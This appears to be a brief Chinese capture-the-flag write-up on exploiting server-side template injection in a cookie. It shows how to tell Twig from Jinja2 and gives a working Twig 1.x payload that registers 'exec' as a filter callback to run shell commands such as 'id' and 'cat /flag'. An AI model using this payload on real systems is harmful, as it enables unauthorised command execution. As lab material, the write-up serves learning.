打开题目
我们先抓包分析一下
可以输入{{7*7}}处发包试一下
可以看到在cookie处存在ssti模板注入
输入{{7*‘7’}},返回49表示是 Twig 模块
输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
在这里可以看出是Twing模块
我们直接用固定payload就可以得到flag
知识点:
1.
输入{{7*‘7’}},返回49表示是 Twig 模块
输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
2.Twing固定的解题payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} //查看ID{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} //查看flag
//只使用于Twing1.x
参考文章见:Twig 模板注入从零到一 - 先知社区
